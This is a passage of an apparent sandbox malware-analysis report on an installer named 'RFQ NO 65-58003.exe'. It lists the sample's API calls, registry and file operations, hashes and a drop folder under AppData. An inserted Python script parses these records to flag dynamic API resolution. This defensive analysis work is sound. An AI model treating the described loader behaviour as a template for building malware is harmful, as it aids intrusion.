                                                                • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                • Part of subcall function 00405840: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\afdragsordning\Overrack2,?,00000000,000000F0), ref: 0040164D
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\afdragsordning\Overrack2, xrefs: 00401640
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\AppData\Roaming\afdragsordning\Overrack2
                                                              • API String ID: 1892508949-2472733074
                                                              • Opcode ID: 17b8e001c82381b5eed68947f2b5b6d32a293e51d78029b264e296644810ab81
                                                              • Instruction ID: 477ca9af34b4fba6f67c9146569026d5a406fcfc9585fcc70d51ae903c55bf24
                                                              • Opcode Fuzzy Hash: 17b8e001c82381b5eed68947f2b5b6d32a293e51d78029b264e296644810ab81
                                                              • Instruction Fuzzy Hash: C511D331504505EBCF30BFA4CD0199E36A0FF15358B25893BE902B22F1DB3E4A919B5E
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                              • CloseHandle.KERNEL32(?), ref: 00405928
                                                              Strings
                                                              • Error launching installer, xrefs: 00405905
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID: Error launching installer
                                                              • API String ID: 3712363035-66219284
                                                              • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                              • Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
                                                              • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                              • Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00403297
                                                                • Part of subcall function 00403402: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004032CA
                                                              • SetFilePointer.KERNELBASE(00D04381,00000000,00000000,00414ED0,00004000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000), ref: 004033C5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FilePointer$CountTick
                                                              • String ID:
                                                              • API String ID: 1092082344-0
                                                              • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                              • Instruction ID: 6f8adcdc05782984f9803186be869087625e4848c31a04748361169110b3332d
                                                              • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                              • Instruction Fuzzy Hash: 66314A72614205DBD7109F29FEC49663BA9F74039A714423FE900F22E0DBB9AD018B9D
                                                              APIs
                                                                • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Enum$CloseOpenValue
                                                              • String ID:
                                                              • API String ID: 167947723-0
                                                              • Opcode ID: d2a030f519bef57aeb41d3aabfee9c269b42944cadf78794d8793362519e5dac
                                                              • Instruction ID: bf3b2bcb6287721b49d379c1e5eb9bed13c1d22dc32754f1d9800637ac4e69b6
                                                              • Opcode Fuzzy Hash: d2a030f519bef57aeb41d3aabfee9c269b42944cadf78794d8793362519e5dac
                                                              • Instruction Fuzzy Hash: 44018F71A04204ABE7109FA59E8CABF766CEF40388F10443EF506A61D0EAF84E419629
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,004281E0,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 00406109
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 0040612A
                                                              • RegCloseKey.ADVAPI32(?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 0040614D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                              • Instruction ID: 5a49725d9b8b462efd799bce316dcbaad7059079bb26d9a6c1e38be835131f9e
                                                              • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                              • Instruction Fuzzy Hash: 2F015A3110020AEACF218F26ED08EDB3BA9EF88391F01403AFD55D6220D774D964CBA5
                                                              APIs
                                                                • Part of subcall function 00405DC2: GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
                                                                • Part of subcall function 00405DC2: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DDB
                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405B9D), ref: 004059D6
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,00405B9D), ref: 004059DE
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                              • String ID:
                                                              • API String ID: 1655745494-0
                                                              • Opcode ID: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
                                                              • Instruction ID: bc22120fb0abf4725c7bfcc2d312b2669146bcdc80e6b93b711a22507a8c90f5
                                                              • Opcode Fuzzy Hash: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
                                                              • Instruction Fuzzy Hash: 29E06572219A9196C2106735590CB5F2998DF86734F054A3BF591B11D0DB7888068A7D
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004031A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                              • Instruction ID: 40ace49db037ace229a3e5c96781d28ed7fa856bf3440834985399bb1b02b3fc
                                                              • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                              • Instruction Fuzzy Hash: 65316B30601219EBDF10DFA5ED84ADA3E68FF04799F20417EF905E6190D7788E509BA9
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                              • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                              • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                              • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                              APIs
                                                                • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AD
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteOpenValue
                                                              • String ID:
                                                              • API String ID: 849931509-0
                                                              • Opcode ID: e6a42a97a56624194c1f16ef160d96f75f01f2dbcd79b4c5bc821ba537a64a6e
                                                              • Instruction ID: c0d23e370c25ffca0c370365ac79ff448217ed3cb42859f8984a45efd79f81dd
                                                              • Opcode Fuzzy Hash: e6a42a97a56624194c1f16ef160d96f75f01f2dbcd79b4c5bc821ba537a64a6e
                                                              • Instruction Fuzzy Hash: A8F0C233A04111ABEB10BBB49B8EAAE72699F40348F11447FF602B71C0C9FC4D428669
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 00405454
                                                                • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                              • CoUninitialize.COMBASE(00000404,00000000), ref: 004054A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: InitializeMessageSendUninitialize
                                                              • String ID:
                                                              • API String ID: 2896919175-0
                                                              • Opcode ID: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                              • Instruction ID: 97e24603e1a40a48e39ce2db5dd5886101c9f28e99c3f4bcfc8565b2c6c37521
                                                              • Opcode Fuzzy Hash: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                              • Instruction Fuzzy Hash: 3DF0F076600601CBD31057549E02BAB72A4EFC0306F46407EEE44A23B1D67A48928A6E
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                                • Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                                • Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
                                                                • Part of subcall function 0040657C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                              • Instruction ID: aacf951b1eba8b902ff867273acd7254ef5911eae3d9513ed99e50af610fe84a
                                                              • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                              • Instruction Fuzzy Hash: 44E026326046206BC31047705E0893762AC9FC83003020C3EF502F2044CB789C329EAD
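The function entry above (call sites 0x004065FE and 0x00406619, with the helper at 0x0040657C) is the concrete evidence behind the report's "Contains functionality to dynamically determine API calls" signature: the helper obtains the system directory (GetSystemDirectoryW), formats a full DLL path with wsprintfW, loads it through LoadLibraryExW with dwFlags 0x00000008 (LOAD_WITH_ALTERED_SEARCH_PATH), and the caller then resolves an export via GetModuleHandleA and GetProcAddress. The Python script below is an added example and is not part of the Joe Sandbox report or its tooling. It parses API records in the report's own "Name.MODULE(args), ref: address" notation (the sample records are copied from the entry above and labelled as such), decodes the LoadLibraryEx flag word, and applies triage rules of this example's own devising; the function names and the rules are assumptions, not anything the sandbox provides.

```python
import re
from typing import List, NamedTuple, Optional

# Constructed sample: the five API records of the function entry above,
# copied from the report (caller at 0x004065FE/0x00406619, helper 0x0040657C).
SAMPLE_API_LINES = """\
GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
GetProcAddress.KERNEL32(00000000,?), ref: 00406619
Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
Part of subcall function 0040657C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
"""

# dwFlags bits of LoadLibraryEx (documented Win32 constants).
LOAD_LIBRARY_EX_FLAGS = {
    0x0001: "DONT_RESOLVE_DLL_REFERENCES",
    0x0002: "LOAD_LIBRARY_AS_DATAFILE",
    0x0008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x0010: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x0020: "LOAD_LIBRARY_AS_IMAGE_RESOURCE",
    0x0100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x0200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x0400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x0800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}


class ApiCall(NamedTuple):
    name: str
    module: str
    args: List[str]          # raw argument strings; "?" = not recovered by the sandbox
    ref: int                 # address of the call site
    subcall: Optional[int]   # helper function the call belongs to, if any


# One record: optional "Part of subcall function XXXXXXXX: " prefix,
# "Name.MODULE", optional "(args)", optional comma, then " ref: XXXXXXXX".
_RECORD = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the report's API records; raise on a line that does not match."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()   # tolerate the page's bullet markers
        if not line:
            continue
        m = _RECORD.match(line)
        if m is None:
            raise ValueError(f"unrecognised API record: {line!r}")
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def hex_arg(arg: str) -> Optional[int]:
    """Return an argument as an int, or None for '?' (value not recovered)."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_loadlibraryex_flags(value: int) -> List[str]:
    """Expand a LoadLibraryEx dwFlags word into constant names."""
    names = [n for bit, n in LOAD_LIBRARY_EX_FLAGS.items() if value & bit]
    known = 0
    for bit in LOAD_LIBRARY_EX_FLAGS:
        known |= bit
    if value & ~known:
        names.append(f"UNKNOWN(0x{value & ~known:x})")
    return names


def classify(calls: List[ApiCall]) -> List[str]:
    """Triage rules (this example's own) over one function's API records."""
    names = {c.name for c in calls}
    findings = []
    loads = any(n.startswith(("LoadLibrary", "GetModuleHandle")) for n in names)
    if loads and "GetProcAddress" in names:
        findings.append("dynamic API resolution: module lookup + GetProcAddress")
    if ({"GetSystemDirectoryW", "GetSystemDirectoryA"} & names
            and any(n.startswith("wsprintf") for n in names)
            and any(n.startswith("LoadLibraryEx") for n in names)):
        findings.append("library loaded by an explicit path under the system directory")
    for c in calls:
        if c.name.startswith("LoadLibraryEx") and len(c.args) >= 3:
            flags = hex_arg(c.args[2])          # third argument is dwFlags
            if flags is not None:
                findings.append(f"LoadLibraryEx dwFlags=0x{flags:x}: "
                                + "|".join(decode_loadlibraryex_flags(flags)))
    return findings


if __name__ == "__main__":
    for finding in classify(parse_api_lines(SAMPLE_API_LINES)):
        print(finding)
```

A "?" in an argument position means the sandbox could not recover that value statically; the script keeps it as unknown rather than treating it as zero, so a LoadLibraryEx record whose flag word is "?" produces no flag finding. The same parser accepts the path-bearing records elsewhere on this page (for example the CreateDirectoryW record that carries the Temp directory as an argument), since arguments are only split on commas inside the parentheses.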
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00405DEB
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
